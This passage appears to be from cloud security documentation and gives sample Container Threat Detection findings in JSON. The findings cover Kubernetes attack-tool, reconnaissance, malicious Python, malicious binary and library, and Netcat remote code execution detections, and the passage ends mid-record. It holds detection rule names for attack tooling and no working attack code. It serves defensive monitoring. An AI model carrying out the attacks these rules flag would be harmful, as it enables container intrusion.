"\"443\"" }, { "name": "\"KUBERNETES_SERVICE_PORT\"", "val": "\"443\"" }, { "name": "\"HOSTNAME\"", "val": "\"ktd-test-ingress-nightmare-2025-04-17-18-54-06-utc\"" }, { "name": "\"PWD\"", "val": "\"/\"" }, { "name": "\"HOME\"", "val": "\"/root\"" }, { "name": "\"KUBERNETES_PORT_443_TCP\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"SHLVL\"", "val": "\"0\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"", "val": "\"tcp\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"", "val": "\"34.118.224.1\"" }, { "name": "\"KUBERNETES_SERVICE_HOST\"", "val": "\"34.118.224.1\"" }, { "name": "\"KUBERNETES_PORT\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PORT\"", "val": "\"443\"" }, { "name": "\"PATH\"", "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"" }, { "name": "\"_\"", "val": "\"/tmp/nginx\"" } ], "pid": "1", "parentPid": "0" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "securityPosture": {}, "severity": "MEDIUM", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "displayName": "CLUSTER_ID", "type": "google.container.Cluster", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "container.googleapis.com", "location": "ZONE", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "parentDisplayName": "PROJECT_ID", "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_ID" } ], "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_ID", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_ID" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] }, "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID" }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "ktd_ingress_nightmare_vulnerability_exploitation" }, "detectionPriority": "MEDIUM", "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": { "seconds": "1744916049", "nanos": 924746656 } } } ], "properties": {}, "findingId": "b19bf4b85b504a5da1a64cdadd4c8194", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/tactics/TA0002/" }, "relatedFindingUri": {} } } }
Exécution : exécution d'un outil d'attaque de Kubernetes
{ "finding": { "access": {}, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Execution: Kubernetes Attack Tool Execution", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "1970-01-01T00:00:00Z" } ], "createTime": "2024-10-21T19:08:35.255Z", "database": {}, "eventTime": "2024-10-21T19:08:35.091Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "NAMESPACE", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "1970-01-01T00:00:00Z" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID" } ] }, "logEntries": [ { "cloudLoggingEntry": { "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": "2024-10-21T19:07:41.503072537Z" } } ], "mitreAttack": { "primaryTactic": "RESOURCE_DEVELOPMENT", "primaryTechniques": [ "OBTAIN_CAPABILITIES" ] }, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "muteUpdateTime": "1970-01-01T00:00:00Z", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "INTERPRETER", "size": "147176", "sha256": "INTERPRETER_SHA_256", "hashedSize": "147176", "partiallyHashed": false, "diskPath": {} }, "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false, "diskPath": {} }, "args": [ "INTERPRETER", "ARG" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"KUBERNETES_SERVICE_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"HOSTNAME\"", "val": "\"ktd-test-kubernetes-attack-suspicious-tool-864dfecdc8d5f5d4\"" }, { "name": "\"HOME\"", "val": "\"/root\"" }, { "name": "\"GPG_KEY\"", "val": "\"7169605F62C751356D054A26A821E680E5FA6305\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"", "val": "\"34.118.224.1\"" }, { "name": "\"PATH\"", "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"", "val": "\"tcp\"" }, { "name": "\"LANG\"", "val": "\"C.UTF-8\"" }, { "name": "\"PYTHON_VERSION\"", "val": "\"3.12.6\"" }, { "name": "\"KUBERNETES_PORT_443_TCP\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_SERVICE_HOST\"", "val": "\"34.118.224.1\"" }, { "name": "\"PWD\"", "val": "\"/\"" } ], "pid": "9", "parentPid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "securityPosture": {}, "severity": "SEVERITY_UNSPECIFIED", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "displayName": "CLUSTER_ID", "type": "google.container.Cluster", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "container.googleapis.com", "location": "ZONE", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "parentDisplayName": "PROJECT_ID", "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_ID" } ], "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_ID", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_ID" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] }, "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID" }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "ktd_kubernetes_attack_tool_execution" }, "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": { "seconds": "1729291973", "nanos": 687426149 } } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1588/002/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal File Link", "url": "https://www.virustotal.com/gui/file/21225e29b4225a4eca16996445e243fdab8051a0ad4bc232b907ef5e9b67f66b/detection" } ], "relatedFindingUri": {} } }, }
Exécution : exécution d'un outil de reconnaissance local
{ "finding": { "access": {}, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Execution: Local Reconnaissance Tool Execution", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "1970-01-01T00:00:00Z" } ], "createTime": "2024-10-21T19:08:35.255Z", "database": {}, "eventTime": "2024-10-21T19:08:35.091Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "NAMESPACE", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "1970-01-01T00:00:00Z" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID" } ] }, "logEntries": [ { "cloudLoggingEntry": { "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": "2024-10-21T19:07:41.503072537Z" } } ], "mitreAttack": { "primaryTactic": "RECONNAISSANCE", "primaryTechniques": [ "ACTIVE_SCANNING" ] }, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "muteUpdateTime": "1970-01-01T00:00:00Z", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "INTERPRETER", "size": "147176", "sha256": "INTERPRETER_SHA_256", "hashedSize": "147176", "partiallyHashed": false, "diskPath": {} }, "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false, "diskPath": {} }, "args": [ "INTERPRETER", "ARG" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"KUBERNETES_SERVICE_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"HOSTNAME\"", "val": "\"ktd-test-local-reconn-suspicious-tool-90e2e63d67bbc483\"" }, { "name": "\"HOME\"", "val": "\"/root\"" }, { "name": "\"GPG_KEY\"", "val": "\"7169605F62C751356D054A26A821E680E5FA6305\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"", "val": "\"34.118.224.1\"" }, { "name": "\"PATH\"", "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"", "val": "\"tcp\"" }, { "name": "\"LANG\"", "val": "\"C.UTF-8\"" }, { "name": "\"PYTHON_VERSION\"", "val": "\"3.12.6\"" }, { "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"KUBERNETES_SERVICE_HOST\"", "val": "\"34.118.224.1\"" }, { "name": "\"PWD\"", "val": "\"/\"" } ], "pid": "9", "parentPid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "securityPosture": {}, "severity": "SEVERITY_UNSPECIFIED", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "displayName": "CLUSTER_ID", "type": "google.container.Cluster", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "container.googleapis.com", "location": "ZONE", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "parentDisplayName": "PROJECT_ID", "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_ID" } ], "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_ID", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_ID" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] }, "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID" }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "ktd_local_reconnaissance_tool_execution" }, "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": { "seconds": "1729291973", "nanos": 687426149 } } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1595/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal File Link", "url": "https://www.virustotal.com/gui/file/21225e29b4225a4eca16996445e243fdab8051a0ad4bc232b907ef5e9b67f66b/detection" } ], "relatedFindingUri": {} } }, }
Exécution : code Python malveillant exécuté
{ "finding": { "canonicalName": "projects/PROJECT_ID/sources/SOURCE_ID/locations/global/findings/FINDING_ID", "category": "Execution: Malicious Python Executed", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2024-06-17T18:50:13Z" } ], "createTime": "2024-06-17T18:50:15.454Z", "description": "A machine learning model using Natural Language Processing techniques identified an executed python script as malicious.", "eventTime": "2024-06-17T18:50:15.217Z", "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "NAMESPACE", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2024-06-17T18:50:13Z" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID" } ] }, "mitreAttack": { "primaryTactic": "EXECUTION", "primaryTechniques": [ "COMMAND_AND_SCRIPTING_INTERPRETER", "PYTHON" ], "additionalTactics": [ "COMMAND_AND_CONTROL" ], "additionalTechniques": [ "INGRESS_TOOL_TRANSFER" ] }, "mute": "UNDEFINED", "muteUpdateTime": "1970-01-01T00:00:00Z", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "INTERPRETER", "size": "3492656", "sha256": "INTERPRETER_SHA_256", "hashedSize": "3492656", "partiallyHashed": false, }, "script": { "path": "FILENAME", "size": "4191", "sha256": "SHA_256", "hashedSize": "4096", "partiallyHashed": true, "contents": "\"#!/usr/bin/env python\\n\\nimport uuid\\nimport subprocess\\nimport os\\nimport sys\\nsys.exit(0)…", }, "args": [ "INTERPRETER", "FILENAME" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"HOSTNAME\"", "val": "\"CONTAINER_NAME\"" }, ], "pid": "7", "parentPid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "severity": "CRITICAL", "state": "ACTIVE", }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "displayName": "CLUSTER_ID", "type": "google.container.Cluster", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "container.googleapis.com", "location": "ZONE", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "parentDisplayName": "PROJECT_ID", "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_ID", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] }, "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID" }, "sourceProperties": { "Process_Arguments": [ "INTERPRETER", "FILENAME" ], "VM_Instance_Name": "INSTANCE_ID", "Process_Binary_Fullpath": { "primitiveDataType": "STRING" }, "description": "A machine learning model using Natural Language Processing techniques identified an executed python script as malicious.", "Container_Creation_Timestamp": { "seconds": 1718650213, "nanos": 0 }, "Pod_Name": "CONTAINER_NAME", "Container_Image_Uri": "CONTAINER_IMAGE_URI", "Container_Image_Id": "CONTAINER_IMAGE_ID", "Parent_Pid": 1, "Container_Name": "CONTAINER_NAME", "Pid": 7, "Process_Creation_Timestamp": { "seconds": 1718650213, "nanos": 762524370 }, "Environment_Variables": [ ], "Pod_Namespace": "default" } }
Exécution : binaire malveillant modifié exécuté
{ "finding": { "access": {}, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID" "category": "Execution: Modified Malicious Binary Executed", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_URI", "imageId": "CONTAINER_IMAGE_ID" } ], "createTime": "2023-11-13T21:38:51.893Z", "database": {}, "eventTime": "2023-11-13T21:38:51.525Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "default", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_URI", "imageId": CONTAINER_IMAGE_ID" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE" } ] }, "mitreAttack": { "primaryTactic": "EXECUTION", "primaryTechniques": [ "NATIVE_API" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "\"/malicious_files/file_to_be_modified\"", "size": "68", "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f", "hashedSize": "68", "partiallyHashed": false }, "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false }, "args": [ "\"/malicious_files/file_to_be_modified\"", "\"modified-malicious-binary-da2a7b72e6008bc3\"" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"KUBERNETES_SERVICE_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT\"", "val": "\"tcp://10.77.124.129:443\"" }, { "name": "\"HOSTNAME\"", "val": "\"ktd-test-modified-malicious-binary\"" }, { "name": "\"HOME\"", "val": "\"/root\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"", "val": "\"10.77.124.129\"" }, { "name": "\"PATH\"", "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"", "val": "\"tcp\"" }, { "name": "\"DEBIAN_FRONTEND\"", "val": "\"noninteractive\"" }, { "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP\"", "val": "\"tcp://10.77.124.129:443\"" }, { "name": "\"KUBERNETES_SERVICE_HOST\"", "val": "\"10.77.124.129\"" }, { "name": "\"PWD\"", "val": "\"/malicious_files\"" } ], "pid": "8", "parentPid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID", "securityPosture": {}, "severity": "CRITICAL", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID", "display_name": "CLUSTER_ID", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parent_display_name": "PROJECT_ID", "type": "google.container.Cluster", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "modified_malicious_binary_executed" }, "detectionPriority": "CRITICAL", "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": { "seconds": "1699905066", "nanos": 618571329 } } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1106/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal IP Link", "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection" } ], "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.084524438Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER" } ], "relatedFindingUri": {} } } }
Exécution : bibliothèque malveillante modifiée chargée
{ "finding": { "access": {}, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID" "category": "Execution: Modified Malicious Library Loaded", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_URI", "imageId": "CONTAINER_IMAGE_ID" } ], "createTime": "2023-11-13T21:38:55.271Z", "database": {}, "eventTime": "2023-11-13T21:38:55.133Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "default", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_URI", "imageId": CONTAINER_IMAGE_ID" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE" } ] }, "mitreAttack": { "primaryTactic": "EXECUTION", "primaryTechniques": [ "SHARED_MODULES" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "\"/malicious_files/drop_mal_lib\"", "size": "5005064", "sha256": "fe2e70de9f77047d3bf5debe3135811300c9c69b937b7fd3e2ca8451a942d5fb", "hashedSize": "5005064", "partiallyHashed": false }, "libraries": [ { "path": "\"/malicious_files/file_to_be_modified\"", "size": "68", "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f", "hashedSize": "68", "partiallyHashed": false } ], "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false }, "args": [ "\"/malicious_files/drop_mal_lib\"", "\"/malicious_files/file_to_be_modified\"", "\"/tmp/modified-malicious-library-430bbedd7049b0d1\"" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"KUBERNETES_SERVICE_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT\"", "val": "\"tcp://10.77.124.129:443\"" }, { "name": "\"HOSTNAME\"", "val": "\"ktd-test-modified-malicious-library\"" }, { "name": "\"HOME\"", "val": "\"/root\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"", "val": "\"10.77.124.129\"" }, { "name": "\"PATH\"", "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"", "val": "\"tcp\"" }, { "name": "\"DEBIAN_FRONTEND\"", "val": "\"noninteractive\"" }, { "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP\"", "val": "\"tcp://10.77.124.129:443\"" }, { "name": "\"KUBERNETES_SERVICE_HOST\"", "val": "\"10.77.124.129\"" }, { "name": "\"PWD\"", "val": "\"/malicious_files\"" } ], "pid": "8", "parentPid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID", "securityPosture": {}, "severity": "CRITICAL", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID", "display_name": "CLUSTER_ID", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parent_display_name": "PROJECT_ID", "type": "google.container.Cluster", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "modified_malicious_library_loaded" }, "detectionPriority": "CRITICAL", "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": { "seconds": "1699911519", "nanos": 124151422 } } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1129/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal IP Link", "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection" } ], "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.124151422Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER" } ], "relatedFindingUri": {} } } }
Exécution : exécution de code Netcat à distance dans un conteneur
{ "finding": { "access": {}, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Execution: Netcat Remote Code Execution in Container", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2024-06-17T18:50:13Z" } ], "createTime": "2025-01-21T19:55:22.017Z", "database": {}, "eventTime": "2025-01-21T19:55:21.762Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "NAMESPACE", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2025-01-21T19:55:19Z" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID" } ] }, "logEntries": [ { "cloudLoggingEntry": { "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": "2025-01-21T19:55:19.654640277Z" } } ], "mitreAttack": {}, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "mitreAttack": { "primaryTactic": "PRIVILEGE_ESCALATION", "primaryTechniques": [ "ESCAPE_TO_HOST" ] }, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": 